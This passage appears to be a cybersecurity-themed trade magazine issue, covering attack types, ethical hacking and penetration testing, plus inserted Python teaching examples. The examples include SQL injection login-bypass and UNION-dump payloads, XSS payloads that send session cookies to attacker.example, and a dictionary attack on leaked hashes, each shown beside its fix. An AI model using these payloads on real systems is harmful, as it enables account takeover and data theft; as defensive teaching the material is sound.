PECB Insights Issue 39 July August 2022 Pages


Issue 39 | ISO Standards and Beyond | July-August 2022

NETWORK SECURITY, ETHICAL HACKING, AND CYBERSECURITY
PROTECT YOUR ONLINE PRESENCE

Sections: Leadership, The Standard, Expertise, Technology, Business & Leisure, Career, Work-Life Balance, Success Story, Opinion, Books, Innovation
In This Issue

6 The Standard: Why Metrology Matters in the Digital Era
8 The Expert: What Do Cyber-Attacks Entail?
16 Opinion: Ethical Hacking vs Penetration Testing
22 Success Story: My Success Story, Jan Carroll
26 Innovation: Network Security Architectures for 5G, Cloud, and Disaggregated Telecom Infrastructures
32 Work-Life Balance: A Day in the Life of a Cybersecurity Expert
38 The Expert: The Use of Blockchain in Cybersecurity
42 Leadership: IoT Security: Definition, Threats, Issues, Defenses, Tools, and Importance
52 Business & Leisure: A Place to Be: Sekondi-Takoradi, The Twin City of Ghana
58 Books: Ensure Your Cyber Safety – Essential Reads
62 Technology: The Impact of AI on Cybersecurity
72 Career: Top Five High-Paying Job Positions You Can Pursue with an ISO/IEC 27032 Certification
74 The Expert: Network Security and Management: A Deeper Understanding
The views and opinions expressed in the PECB Insights Magazine do not necessarily reflect the views of PECB Group.
© PECB 2022. All rights reserved.
“The five most efficient cyber defenders are: Anticipation, Education, Detection, Reaction and Resilience. Do remember: Cybersecurity is much more than an IT topic.”

STEPHANE NAPPO
Vice President - Global Chief Information Security Officer, Groupe SEB

THE STANDARD
WHY METROLOGY MATTERS IN THE DIGITAL ERA

Tomorrow's metrology is the science of measurement for the digital economy.

Digital technologies such as artificial intelligence, big data and machine learning are increasingly important to the manufacturing industry. Just imagine the implications on metrology – the science of measurement.

“Metrology in the Digital Era” is the theme of this year's World Metrology Day, celebrated annually on 20 May. The theme was chosen because digital technology is revolutionizing metrology and is one of the most exciting trends in society today. Accurate and fair data is an important cornerstone of the digital development of science and technology. The resulting high-quality data, based on measurement standards, is the key to taking our industry to the next level in the digital milestone.

As the BIPM and BIML directors state in their joint message: “The digital transformation of metrology can bring many benefits to our community. It can expedite time to market for measurement products and services and reduce delays associated with approval processes. In turn, this contributes to innovation, product agility, and sustainability.”

ISO has just signed the Joint Statement of Intent on the digital transformation in the international scientific and quality infrastructure. The joint statement provides a platform for the signatory organizations to indicate their support in a way that is appropriate to their particular organization.

This common understanding will help advance the development, implementation, and promotion of the SI Digital Framework as part of a wider digital transformation of the international scientific and quality infrastructure.


The Joint Statement of Intent is part of an ongoing initiative to develop and establish a worldwide uniform and secure data exchange format based on the International System of Units (SI), also known as the SI brochure.

The ISO 80000 series of standards for quantities and units is a vital element of the SI brochure, as it provides harmonized terms, definitions, and symbols of quantities and units used in science and engineering, providing a unified language for communicating accurate measurement information between scientists, engineers and anyone involved in measurement.

The SI Digital Framework will enable the implementation of new services that make best use of open data formats, software tools, and services that build upon the SI core representation. Such services will help to produce high-quality data and make it available for analysis in a coherent and consistent form. The outcome will be new digital applications developed and deployed in the broader metrology community and in research disciplines that rely on the SI.

The joint statement had previously been signed by the BIPM, the International Organization of Legal Metrology (OIML), the International Measurement Confederation (IMEKO), the International Science Council (ISC), and its Committee on Data (CODATA). “The addition of ISO further strengthens the collaboration and global reach of the initiative,” reads the BIPM press release.

Celebrated each year on 20 May, World Metrology Day commemorates the day back in 1875 on which the Treaty of the Meter was signed, laying the foundations of a global system for common measurements that are all based on constants of nature. The International Bureau of Weights and Measures (BIPM) and the International Organization of Legal Metrology (OIML), which organize World Metrology Day, actively liaise with a number of ISO technical committees.

Disclaimer: PECB has obtained permission to publish the articles written by ISO.


What Do Cyber-Attacks Entail?

BY VIJAY KUMAR
THE EXPERT

The cyber world is growing rapidly, and everyone is involved, either directly or indirectly. Everything is available with a single click or tap on your mobile, tablet, or PC: you can browse websites, listen to or download audio, video, and software, place orders, buy products, and book tickets, hotels, buses, or taxis. The cyber (or digital) world has made all of this easy for everyone. That is the bright side, which you enjoy in your daily routine; there is also a dark side that exists in reality, called cyber crime or hacking.

Have you ever heard about cyber crime? It happens through cyber-attacks.

What is a cyber-attack?
The most valuable asset nowadays is data, not only for organizations but also for individual users. If you are able to protect your information or data, you or your organization are stable and secure. At first glance, the importance may be difficult to grasp for those not well versed in this industry, but understanding the need to stay protected is of high value today. Cyber-attackers are seeking these assets at all times.

If you have data, you may fall victim to a cyber-attack.

We can define a cyber-attack as any illegal action by cybercriminals, hackers, or other actors attempting unauthorized access to a computer, information system, network, infrastructure, personal computer, or device (including tablets, mobile phones, smart watches, smart TVs, or other smart devices), using various methods to steal, alter, breach, modify, or destroy data or information systems.

What are the typical cyber-attacks?

1. Malware
In the cyber world, it has become common knowledge that around 300,000 new pieces of malware are created daily.


Malware is a piece of code (software) that can be installed easily on your server, laptop or desktop, mobile device, tablet, etc., and it is used to leak private information or gain unauthorized access to data, information, or systems.

As stated by Datto, some types of malware are:

• Viruses — These infect applications by attaching themselves to the initialization sequence. The virus replicates itself, infecting other files or code in the computer system. Viruses can also attach themselves to executable code or associate themselves with a file by creating a virus file with the same name but with a .exe extension, thus creating a decoy that carries the virus.
• Trojans — A program with malicious purposes hiding inside a helpful program. It is commonly used to steal information or establish a backdoor to be exploited by attackers.
• Worms — Unlike viruses, they do not attack the host, being self-contained programs that propagate across networks and computers. Worms are often installed through email attachments. They are commonly used to overload an email server and achieve a denial-of-service attack.
• Spyware — These programs are installed on laptops, mobiles, and other devices and are used to collect information about users, their systems, or browsing activities, sending the data to a remote user, the hacker.

2. Phishing

Approximately 6.4 billion fake emails are sent every day, which is why a single phishing campaign targets many victims at once. Phishing is the most common and popular cyber-attack: it sends mass quantities of fraudulent emails to unsuspecting users in a manner that appears to come from a reliable source. Phishing attacks can also occur via social media, direct messages, or other online communities, targeting users with hidden intent.

There are multiple types of phishing attacks, as follows:

• Spear Phishing — Specific organizations or individuals are targeted
• Whaling — Senior directors, stakeholders, or C-level executives are targeted in an attempt to gain access to classified information
• Pharming — The attacker uses a Domain Name System (DNS) cache poisoning attack to manipulate a DNS entry, redirecting users to a fake landing page that captures their credentials
• Voice Phishing (vishing) and SMS Phishing (smishing) — Attackers use phone calls or text messages to manipulate users into handing over information

3. Ransomware
Ransomware is malware that encrypts the critical data of a user or an organization so that they cannot access files, databases, or applications. The attacker releases the decryption key, and with it the data, only after the ransom is paid. Without the private key, it is computationally infeasible to decrypt the files being held to ransom. According to snap-tech.com, global ransomware damage costs are predicted to exceed $265 billion by 2031.

4. Cryptojacking
Cryptojacking is another form of cyber-attack. It is the hacker's unauthorized use of the victim's computing resources to mine cryptocurrency, kept entirely hidden from the victim.

5. Drive-By Attack
In a drive-by attack, sometimes referred to as a drive-by download, the attacker exploits vulnerabilities in web browsers, plugins, or apps so that merely visiting a page is enough to launch the attack; no further action from the victim is required. Through it, hackers can hijack the device and install malware, a keylogger, or spyware to spy on the user's activity in an attempt to steal critical data or personal information.

6. MitM (Man-in-the-Middle) Attack
This attack is commonly performed over public Wi-Fi. The attacker inserts themselves between the public Wi-Fi access point and the visitor's device and intercepts the two-party communication or transaction. From there, cyber-attackers can steal passwords and other sensitive information, or manipulate the data by altering traffic in transit.

7. Session Hijacking
In this attack, the attacker takes over an established session between a client and a server, typically by obtaining the session token (cookie). With it, the attacker acts as the victim, for example in their social media accounts, and the victim effectively loses control of those accounts.


8. Password Attack
Because passwords are the most basic mechanism used to authenticate users to an information system, obtaining passwords is a common and effective approach to attack. The attacker uses sniffing, social engineering, and other techniques to get access to passwords or to a password database, or resorts to outright guessing. Guessing can be done in a random or systematic manner: a brute-force attack tries every possible combination, and a dictionary attack tries likely passwords from a word list.
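To show why a stolen password database is so valuable, here is an added example (not code from the article or its author) of a dictionary attack against unsalted, single-round SHA-256 hashes, beside the same attack against salted PBKDF2 records. The leaked table and the word list are constructed for the example; the iteration count follows current OWASP guidance and is an assumption you should tune to your own hardware.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# Constructed sample data for this example: a leaked table of unsalted SHA-256
# password hashes, the way a weakly designed application might store them.
LEAKED_SHA256: Dict[str, str] = {
    "alice": hashlib.sha256(b"summer2022").hexdigest(),
    "bob":   hashlib.sha256(b"Tr0ub4dor&3").hexdigest(),  # not in the wordlist below
    "carol": hashlib.sha256(b"password").hexdigest(),
}

# Constructed wordlist standing in for a real one such as rockyou.txt.
WORDLIST: List[str] = ["123456", "password", "qwerty", "summer2022", "letmein"]


def dictionary_attack_sha256(hashes: Dict[str, str], wordlist: List[str]) -> Dict[str, str]:
    """Dictionary attack against unsalted, single-round SHA-256 hashes.

    With no salt, each candidate word is hashed once and the result is looked up
    against every user at the same time, so the cost is len(wordlist) hashes
    regardless of how many users leaked.
    """
    lookup = {hashlib.sha256(word.encode()).hexdigest(): word for word in wordlist}
    return {user: lookup[digest] for user, digest in hashes.items() if digest in lookup}


# Hardened storage: a random per-user salt and a deliberately slow key derivation
# function. 600,000 iterations is the OWASP (2023) recommendation for
# PBKDF2-HMAC-SHA256 (assumed here; tune it to your hardware).
PBKDF2_ITERATIONS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> Tuple[bytes, bytes]:
    """Return (salt, digest); a fresh 16-byte salt is generated when none is given."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes,
                    iterations: int = PBKDF2_ITERATIONS) -> bool:
    """Constant-time comparison so timing does not leak how many bytes matched."""
    _, candidate = hash_password(password, salt, iterations)
    return hmac.compare_digest(candidate, digest)


def dictionary_attack_pbkdf2(records: Dict[str, Tuple[bytes, bytes]], wordlist: List[str],
                             iterations: int = PBKDF2_ITERATIONS) -> Tuple[Dict[str, str], int]:
    """The same dictionary attack against salted PBKDF2 records.

    Returns the recovered passwords and the number of KDF evaluations spent: the
    salt removes the shared lookup table, so the attacker pays per user per word,
    and each evaluation costs `iterations` HMAC rounds instead of one hash.
    """
    recovered: Dict[str, str] = {}
    evaluations = 0
    for user, (salt, digest) in records.items():
        for word in wordlist:
            evaluations += 1
            if verify_password(word, salt, digest, iterations):
                recovered[user] = word
                break
    return recovered, evaluations


if __name__ == "__main__":
    print("unsalted SHA-256:", dictionary_attack_sha256(LEAKED_SHA256, WORDLIST))
    # A low iteration count keeps the demo quick; production uses PBKDF2_ITERATIONS.
    records = {u: hash_password(p, iterations=1_000)
               for u, p in [("alice", "summer2022"), ("bob", "Tr0ub4dor&3")]}
    print("salted PBKDF2:", dictionary_attack_pbkdf2(records, WORDLIST, iterations=1_000))
```

Salting does not stop a weak password such as "summer2022" from being guessed; it removes the shared lookup table so every user costs the attacker a separate run over the word list, and the slow KDF multiplies the cost of each guess by the iteration count. Strong, unique passwords remain the user's side of the defence.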

9. Rootkits
Hackers hide rootkits inside seemingly legitimate software; once the victim installs that software, the rootkit is activated and the attackers gain remote control or administrator-level access over the system. The attacker then uses it to steal passwords, keys, or other credentials and to retrieve critical data.

10. Internet of Things (IoT) Attacks

Multiple studies show that a large percentage of organizations worldwide have experienced an IoT attack.

Attacks on IoT devices are growing rapidly as the devices gain popularity, while embedding security into their operating systems is given low priority.

11. Denial-of-Service (DoS) Attack

In a DoS attack, attackers flood systems, servers, or networks with traffic, overloading resources and bandwidth. As a result, the server or system is unable to process legitimate requests. A distributed denial-of-service (DDoS) attack is the same technique launched from many compromised sources at once, typically a botnet.

12. SQL Injections

In this attack, an attacker supplies crafted input that the application passes, unsanitized, into a Structured Query Language (SQL) query, forcing the database server to deliver protected information or to alter data. This happens on unprotected or less secure websites that build queries directly from user input.
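The following is an added example, not code from the article, showing the weakness described above in a login check and the parameterized query that fixes it. It uses Python's built-in sqlite3 module with a constructed in-memory users table; the table, its rows and the two attack strings are assumptions made for the demonstration.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample database for this example.

    Passwords are stored in clear only to keep the demonstration short;
    a real application stores a salted, slow hash instead.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "user"), ("admin", "hunter2", "admin")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, str]]:
    """Builds the query by string formatting, so the input becomes part of the SQL.

    The username  admin' --  closes the string literal, then comments out
    the rest of the WHERE clause, including the password check.
    """
    sql = (
        f"SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, str]]:
    """Parameterized query: the driver sends values separately from the SQL text,
    so a quote or comment sequence in the input is just data, never syntax."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Two classic payloads (constructed for the example).
BYPASS = "admin' --"                                   # authentication bypass
DUMP = "' UNION SELECT password, role FROM users --"   # read another column via UNION


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass:", login_vulnerable(db, BYPASS, "anything"))
    print("vulnerable, dump:  ", login_vulnerable(db, DUMP, ""))
    print("safe, bypass:      ", login_safe(db, BYPASS, "anything"))
    print("safe, real creds:  ", login_safe(db, "alice", "s3cret"))
```

The vulnerable function logs the attacker in as admin without a password and, with the UNION payload, returns every stored password; the parameterized version returns nothing for both payloads and only succeeds with real credentials. Input validation is a useful second layer, but parameterization (or an ORM that parameterizes for you) is the fix.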

13. Zero-Day Exploit

A zero-day exploit refers to exploiting a vulnerability in an application, system, network, etc. that is unknown to the vendor and the public, so that there have been "zero days" to fix it. The term is also used for exploiting a newly announced vulnerability before any patch has been released or implemented.

14. Cross-Site Scripting
A cross-site scripting (XSS) attack injects malicious scripts into content served by an otherwise trusted website that fails to validate or encode user input. The malicious code is delivered to the victim's browser together with the site's dynamic content. Usually it is JavaScript executed in the victim's browser, but it can be any active content the browser will run, such as injected HTML or, in older browsers, Flash.

Facts about Cyber-attacks:

1. Botnets are responsible for 31% of all cyber-attacks targeting corporate networks.
2. Education and Research was the most targeted sector, facing an average of 1,605 weekly attacks.
3. EXE files make up 52% of all malicious files, PDFs 20%, and DOCs 5%.
4. Over 84% of all cyber-attacks were distributed via e-mail in 2021.
5. Cybercriminals can penetrate 93% of company networks.
6. Cyber-attacks were up 50% in 2021 compared to 2020, peaking in December, largely due to Log4j exploitation.
7. Software supply chain attacks increased by 650% in 2021.
8. The healthcare industry has seen a 51% increase in breaches and leaks since 2019. Furthermore, 70% of surveyed organizations reported healthcare ransomware attacks.
9. By 2025, cryptocurrency crime is predicted to surpass $30 billion, up from $17.5 billion in 2021, according to Cybersecurity Ventures.
10. In a recent phishing attack, $7 million in NFTs were stolen from OpenSea users.
11. In 2021, organizations experienced the highest average cost of a data breach in 17 years, at $4.24 million, rising from $3.86 million the previous year.
12. Mobile apps are responsible for 80% of mobile fraud.

Can ethical hacking protect you from cyber-attacks?
Ethical hacking not only protects you from cyber-attacks but also combats the hacker. Hacking is a set of skills, methods, and techniques used by a hacker to commit a cyber-attack.
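To make the cross-site scripting entry above concrete, here is an added example (not code from the article) that renders a user comment into a page three ways: unescaped, after a blocklist that strips only script tags, and with proper HTML output encoding. The two attacker payloads, the page template and the attacker hostname are constructed for the example; the `has_active_markup` check is a crude illustration, not a production filter.

```python
import html
import re

# Constructed attacker inputs for this example: a comment that exfiltrates the
# session cookie, and a second payload that carries no <script> tag at all.
SCRIPT_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
IMG_PAYLOAD = "<img src=x onerror=\"fetch('https://attacker.example/?c=' + document.cookie)\">"

PAGE = "<html><body><h1>Comments</h1>{comment}</body></html>"


def render_vulnerable(comment: str) -> str:
    """Reflects the comment into the page unchanged: the XSS described above."""
    return PAGE.format(comment=f"<div class='comment'>{comment}</div>")


def strip_script_tags(comment: str) -> str:
    """Blocklist 'fix' that only removes <script> blocks. Inline event handlers
    (onerror, onload, ...) and other active markup pass straight through."""
    return re.sub(r"<script\b.*?>.*?</script>", "", comment, flags=re.I | re.S)


def render_safe(comment: str) -> str:
    """Output encoding for an HTML text context: <, >, &, \" and ' become
    entities, so the browser displays the payload as text and never runs it."""
    return PAGE.format(comment=f"<div class='comment'>{html.escape(comment, quote=True)}</div>")


def has_active_markup(rendered: str) -> bool:
    """Illustrative check only: does the rendered page still contain a raw
    <script> tag or a tag carrying an on* event-handler attribute?"""
    return bool(re.search(r"<script\b|<\w+[^>]*\son\w+\s*=", rendered, re.I))


if __name__ == "__main__":
    for name, payload in (("script", SCRIPT_PAYLOAD), ("img onerror", IMG_PAYLOAD)):
        print(name)
        print("  vulnerable :", has_active_markup(render_vulnerable(payload)))
        print("  blocklist  :", has_active_markup(render_vulnerable(strip_script_tags(payload))))
        print("  escaped    :", has_active_markup(render_safe(payload)))
```

The blocklist stops the first payload and misses the second, which is why encoding on output, chosen for the context the data lands in (HTML body here; attributes, JavaScript and URLs each need their own encoder), is the defence, with a Content-Security-Policy header as a second layer.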


Ethical hacking is the process of hacking in an ethical, authorized way; the persons involved in this process are called ethical hackers.

Ethical hackers are responsible to:

• Test a system, application, or network for security vulnerabilities in order to evaluate its security posture.
• Test the security of the system, find any weaknesses, and suggest ways to improve it.
• Perform regular penetration testing, which helps to improve the security of the system, web app, and network.
• After identifying vulnerabilities in the system, create reports and provide feedback once the issue has been resolved.
• Inform the organization of the possible effects on its operations and users.
• Use hacking as a technique to find solutions for the system's exploitable points.

Essential steps to protect yourself from cyber-attacks:

• Install anti-virus and anti-malware software on your devices (PC, mobile).
• Set up a strong password (a combination of numbers, lower- and upper-case letters, and symbols), gesture, or fingerprint.
• Avoid common and basic passwords. Use different passwords for different websites.
• Always hide or switch off Bluetooth when not in use and disable automatic connection to networks.
• Do not open emails from unknown sources (email addresses) and avoid risky clicks.

Vijay Kumar
Ethical Hacking, VAPT, CEH, CompTIA Security+, CySA, Linux, and Networking Trainer

Vijay Kumar has several years of experience in the field of cybersecurity as a trainer, writer, and consultant. He has experience delivering training on Ethical Hacking, VAPT, CompTIA Security+, CompTIA CySA+, CEH, OSCP, Linux System & Server Administration, and Networking (Basic and Advanced). He has delivered training to individuals, college students, corporates, and government bodies. You may reach him through https://cyberpratibha.com/

PECB is Delighted to Receive the “Most Innovative Cybersecurity Training” Award 2022

This award is presented to PECB by the prestigious Global InfoSec Awards 2022, which honors companies that present a unique and valuable scheme for their services and products.

We would like to deeply thank our customers and network for their continual trust and support. Through that, we have been able to accomplish yet another achievement that reinforces our credibility, hard work, and commitment to continuously provide the greatest quality services to our clients.

Ethical Hacking vs Penetration Testing
BY BASSEM LAMOUCHI
OPINION

During the last decade, we have faced the grim reality that is cyber-attacks in their most sophisticated forms: incidents orchestrated by malicious actors that tested many companies' cybersecurity practices and even brought some companies to bankruptcy.

The goals of such attacks vary depending on the actor: criminals do it for financial gain, activists operate for a multitude of reasons (fun, profit, and advocating change), and state-aligned actors attack each other as a new form of warfare.

These attacks have been getting more and more sophisticated as time goes by. There are many examples, such as the most prolific ransomware group, Conti, which managed to extract $180 million from its victims last year through various cyber-attacks, or the Netwalker ransomware attack on Equinix, one of the largest data center providers in the world, which came with a $4.5 million demand.

As these attacks evolve, the defending side also adapts and develops in order to protect and secure public and private infrastructure from these devastating attacks, often in new, innovative, and clever ways, since the old approach of simple cybersecurity and compliance audits is no longer sufficient on its own.

This is the gap created by modern, sophisticated cyber-attacks. Two decades ago, a crude but thorough cybersecurity and compliance audit was sufficient, since most corporate infrastructure was relatively small compared to the modern, federated, decentralized, cloud- and microservice-based infrastructure of today.

Securing, auditing, and maintaining massive modern networks requires considerable time and effort and a specific competence not easily found among most network engineers and other IT professionals.

Many new approaches and strategies have been invented to deal with this issue; so far, the most commonly utilized strategy is the employment of a wide set of practices under the term "ethical hacking."


What is ethical hacking exactly, and what does it constitute?

In simple terms, ethical hacking is an authorized, simulated attack against a computer, network, or organization to identify existing cybersecurity vulnerabilities and system misconfigurations, gauge the risks, and protect them from real threat actors (malicious hackers).

It is possibly one of the most effective, time- and cost-efficient ways to enhance an organization's cybersecurity posture, due to its flexible nature and realistic practices.

Are such practices legal?

The target organization explicitly authorizes these operations in order to assess its security posture and fix any weaknesses that exist within.

In fact, these operations are often ordered by the higher-ups of the organization, sometimes without the knowledge of subordinates in order to simulate an actual attack, but this is not always the case, as the scope and goals vary from one operation to another.

Who executes ethical hacking operations?

Authorized attacks are often carried out by professional cybersecurity experts known as "white hats" or "white hat hackers." Regarding technical proficiency, white hats must present a thorough, top-to-bottom expertise in networks, operating systems, databases, web servers, web applications, mobile applications, and other concepts such as cloud computing and IoT.

As for trade proficiency, white hats must have a grasp of the legalities surrounding the operation and the industry as a whole, the principles of information security, and the compliance involved.

What does ethical hacking consist of?

Ethical hacking is a very broad term that helps companies evaluate the risks of cyber-attacks and can encapsulate many operational concepts depending on the customer's goals and desired scope of simulation, but the four most relevant ones are vulnerability assessments, penetration testing, red teaming, and bug bounty programs. These operations vary in size, scope, rules of engagement, and goals.

A. Vulnerability Assessment

Usually considered an audit against a target or a list of targets that vary in nature (networks, computers, or applications), attempting to find all known vulnerabilities.

Vulnerability assessments attempt to discover a very wide range of vulnerabilities, misconfigurations, and non-compliances that developers and system administrators usually cannot catch; a vulnerability assessment must therefore be thorough, rigorous, and methodical.


Vulnerability assessment follows a very specific four-step lifecycle:

1. Asset discovery
2. Asset prioritization and target configuration
3. Vulnerability scanning
4. Result analysis and actions

1. Asset discovery

First, the operator needs to make sense of the target infrastructure and understand the big picture. This is usually a tricky phase, since the operator has no guarantee that the target will be fully visible, and even if it is, organizing its digital footprint is tougher still.

2. Asset prioritization and target configuration

This part of the assessment is completed by organizing the assets into clearly ordered priorities and organized attack metrics. This is not necessary if the customer can afford a full scan of each and every one of its assets, but most cannot afford it, so they resort to scanning their most critical assets, which are usually public internet-facing web applications and servers, or internal critical infrastructure such as a domain controller. Some targets require finer tuning than others depending on their nature, criticality, and robustness.

3. Vulnerability scanning

The most important step of the process: using a massive database of publicly known vulnerabilities and the ability to scan, probe, and check the target's services for those vulnerabilities. It is only a matter of time until the vulnerabilities are identified and the report is generated against a predefined baseline. At this stage, the pentest team must configure the vulnerability scanners carefully to reduce the number of false positives.

4. Result analysis and actions

Vulnerability scanners, no matter how advanced, are still tools; they may generate false positives, identify a vulnerability that does not really exist, or bump up the severity rating on a relatively harmless bug. Therefore, human bug triaging and analysis is instrumental to a successful assessment: the operators check and recheck the existence and severity of the identified bugs and vulnerabilities, in order to patch them in a suitable manner.

B. Penetration Testing

Often compared to a red teaming exercise, penetration testers use their experience to attempt to attack all possible angles of the organizational structure.

Penetration tests also usually consist of a comprehensive five-step lifecycle:

1. Planning and Reconnaissance
2. Scanning
3. Gaining System Access
4. Persistent Access and Housekeeping
5. Analysis and Reporting

1. Planning and Reconnaissance

This phase covers describing and defining the scope and limits of the test, plus a preliminary (often automated) information-gathering mission to understand the infrastructure and topology of the target entity. By the end of this step, the pentest team will have as much information as possible to map the attack surface.

2. Scanning

Based on the information acquired in phase one, this phase obtains not only a complete, top-to-bottom, granular technical overview of the target entity's technology stacks (services, defensive measures, etc.), but also a list of vulnerabilities that can be exploited.

3. Gaining System Access

The penetration testers parse all the information acquired throughout phases one and two and look for misconfigurations and exploitable vulnerabilities that will allow them to gain network or system access belonging to the target, then run the payload to exploit the target.

4. Persistent Access and Housekeeping

Once one or more systems have been successfully attacked, the penetration testers try to understand how far they can go inside the target environment by compromising more machines, intruding on more networks, escalating their privileges, and packaging and exfiltrating as much valuable data as possible. The testers must not forget that housekeeping is essential: any modifications to the target systems must be reverted and rolled back; in other words, the target system must be exactly as it was before the penetration test started.


5. Analysis and Reporting

The penetration testers compile the results and findings of their operation into a report: the vulnerabilities exploited, a list of machines successfully compromised, and weaknesses found in security systems.

This report is sent to the target organization for analysis. In the meantime, the penetration testers work with the corresponding team to fix any weaknesses they found. It is pivotal that organizations running critical infrastructure conduct penetration tests regularly and often, to get the most accurate and complete overview of their security posture.

C. Red Teaming

Attempts to simulate a real threat actor's attack against the target organization, trying to gain access and reach the goals by any means necessary.

Most members of the organization should have no idea that a red teaming operation is taking place; otherwise, it defeats the purpose. Operators will use tactics that emulate known adversaries (criminals, state actors), as well as develop their own tactics.

Red teaming follows an attack lifecycle very similar to penetration tests, but unlike penetration tests, where the target is to map out and exploit every attack vector possible, the red team's target is to reach a well-defined objective, such as access to a server, access to a network, creating a successful data breach, or acquiring a domain controller admin account. Usually, red teaming operations follow the MITRE ATT&CK framework and mostly deliver the attack using social engineering.

D. Bug Bounties

A method of loose cooperation between corporations and paid volunteers in the form of a bounty program: bug bounties are essentially companies giving ethical hackers permission to attempt to exploit their applications and infrastructure, as long as the ethical hacker cooperates in responsible vulnerability disclosure. The payoffs are often substantial.
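Steps 2 and 4 of the vulnerability assessment lifecycle above (asset prioritization, then human triage of scanner output) are where most of the analyst's judgement goes, so here is an added example, not code from the article, of how that judgement is typically encoded. The asset inventory, the scanner findings, the false-positive list and the scoring rule (CVSS base score multiplied by a 1-to-5 business criticality) are all assumptions constructed for the example; hostnames are placeholders.

```python
from typing import Dict, List, Set, Tuple

# Hypothetical asset inventory from the asset prioritization step: business
# criticality on a 1 (low) to 5 (crown jewel) scale. Hostnames are placeholders.
ASSET_CRITICALITY: Dict[str, int] = {
    "www.example.test":          5,   # public-facing web application
    "dc01.corp.example.test":    5,   # domain controller
    "print01.corp.example.test": 1,   # office printer
}

# Constructed scanner output. Field names are hypothetical; real scanners export
# similar records (host, port, check name, CVSS base score).
FINDINGS: List[dict] = [
    {"host": "www.example.test", "port": 443, "check": "TLS 1.0 enabled", "cvss": 5.3},
    {"host": "www.example.test", "port": 443, "check": "TLS 1.0 enabled", "cvss": 5.3},  # repeated by a 2nd scan run
    {"host": "www.example.test", "port": 443, "check": "Outdated web framework (banner)", "cvss": 9.8},
    {"host": "dc01.corp.example.test", "port": 445, "check": "SMB signing not required", "cvss": 5.3},
    {"host": "print01.corp.example.test", "port": 9100, "check": "Unauthenticated raw printing", "cvss": 7.5},
    {"host": "print01.corp.example.test", "port": 80, "check": "Directory listing", "cvss": 5.3},
]

# Human triage (step 4): the framework banner is stale because the vendor
# backported the fix, so the analyst verified that finding as a false positive.
FALSE_POSITIVES: Set[Tuple[str, int, str]] = {
    ("www.example.test", 443, "Outdated web framework (banner)"),
}

UNKNOWN_ASSET_CRITICALITY = 3   # assumption: unlisted host counts as medium until inventoried


def triage(findings: List[dict], criticality: Dict[str, int],
           false_positives: Set[Tuple[str, int, str]]) -> List[dict]:
    """Deduplicate scanner findings, drop verified false positives, and rank
    what is left by risk = CVSS base score x asset criticality."""
    unique: Dict[Tuple[str, int, str], dict] = {}
    for f in findings:
        key = (f["host"], f["port"], f["check"])
        unique.setdefault(key, f)        # identical repeats from extra scan runs collapse
    ranked: List[dict] = []
    for key, f in unique.items():
        if key in false_positives:
            continue                      # analyst already disproved it; keep it out of the report
        crit = criticality.get(f["host"], UNKNOWN_ASSET_CRITICALITY)
        ranked.append({**f, "criticality": crit, "risk": round(f["cvss"] * crit, 1)})
    # Highest risk first; host and port break ties so the order is stable.
    ranked.sort(key=lambda r: (-r["risk"], r["host"], r["port"]))
    return ranked


if __name__ == "__main__":
    for r in triage(FINDINGS, ASSET_CRITICALITY, FALSE_POSITIVES):
        print(f"{r['risk']:5.1f}  {r['host']}:{r['port']}  {r['check']}")
```

The point the ranking makes is the one the article makes in words: the printer's 7.5 finding drops below a 5.3 on the domain controller once criticality is applied, and the highest-scored scanner hit disappears entirely because a human checked it. A real programme would also track remediation owners and re-scan dates, which is outside this example.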


Many large corporations, such as FAANG (Facebook, Amazon, Apple, Netflix, and Google), and even government organizations, such as the US Department of Defense (DoD), run their own bug bounty programs.

This kind of program helps companies fix new vulnerabilities; the vulnerabilities are assigned a unique ID, a CVE (Common Vulnerabilities and Exposures) identifier, and added to the database of publicly known vulnerabilities that vulnerability scanners rely on.

Each of these methodologies and operations employs ethical hacking and is essential to maintaining a sufficiently advanced cybersecurity posture to protect organizations, their subsidiaries, and their assets from harm caused by all sorts of malicious actors in cyberspace.

None of these methodologies is enough on its own; they all must be combined and carried out regularly, or the organization risks asset loss through cyber-attacks.

Bassem Lamouchi
EC-Council and PECB Trainer | Third Party Auditor | CISSP | SOC Analyst | CEH MASTER | CHFI | ECIH

Bassem is a cybersecurity and Cloud Computing professional with highly valuable technical skills. He has successfully led many security audits, incident handling, and forensics projects in the private sector, particularly in the banking and financial services sector. Bassem has gained valuable international experience, which includes working in Ivory Coast, Mali, Niger, Togo, Senegal, Benin, France, Canada, Guinea, Burundi, Kenya, Madagascar, and Ghana. In addition to consulting, he is a certified PECB trainer teaching courses such as ISO/IEC 27001, ISO 22301, ISO 21001, ISO/IEC 27032, Lead Ethical Hacking, and Lead Cloud Security Manager.


My Success Story
Jan Carroll
SUCCESS STORY

In May 2021, Ireland suffered its most catastrophic


cybersecurity attack to date. Our Health Service Executive,
which manages our national health service of 4,000
locations, 54 acute hospitals, and over 70,000 devices,
suffered a Conti ransomware attack from the Russia-based
Wizard Spider group.

Almost immediately, the IT systems were shut down and


internet access was removed. The HSE is the largest
employer in the state with over 130,000 staff, all of whom
reverted to using pen and paper with no access to patient
records. As it was a ‘double extortion’ attack the attackers
had also stolen patient data which they were threatening
to release, some of which was published online.

This had a huge impact on patient care as thousands of


appointments were canceled. The group demanded €16.5
million in ransom which was not paid but in a surprising
turn of events, the gang released the decryption key. The
clean-up operation took months and reports of costing
up to €500 million, the effects of this attack are still
being experienced.

Other opportunistic criminals took advantage of this


event and the leaked data, as a pretext for vishing
